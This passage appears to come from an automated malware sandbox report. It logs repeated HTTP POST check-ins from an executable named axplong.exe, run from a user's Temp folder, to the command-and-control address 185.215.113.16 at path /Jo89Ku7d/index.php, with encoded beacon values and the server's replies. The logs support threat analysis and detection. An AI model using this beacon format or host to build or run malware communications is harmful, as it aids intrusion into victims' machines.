                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:31.969443083 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.449762185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:32.100945950 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:32.800465107 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:32.801619053 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:33.030148029 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.449763185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:33.152729034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:33.843264103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:33.844074965 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:34.071610928 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.449764185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:34.179425001 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:34.889616013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:34.890603065 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:35.118401051 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.449765185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:35.226705074 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:35.923831940 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:35.928114891 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:36.154902935 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.449766185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:36.272689104 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:36.979429007 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:36.982070923 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:37.214258909 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.449767185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:37.336056948 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:38.026654005 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:38.027689934 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:38.250739098 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  31192.168.2.449768185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:38.369590044 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:39.070564985 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:39.071377993 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:39.301939011 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  32192.168.2.449769185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:39.413403034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:40.141980886 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:40.142904043 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:40.376144886 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  33192.168.2.449770185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:40.492649078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:41.203954935 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:41.205070019 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:41.438050985 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  34192.168.2.449771185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:41.555546045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:42.246085882 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:42.247098923 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:42.470417976 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.449772185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:42.585969925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:43.360661030 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:43.361581087 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:43.594156981 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.449773185.215.113.16807556C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 13:53:43.710047960 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:44.408443928 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:44.409878969 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
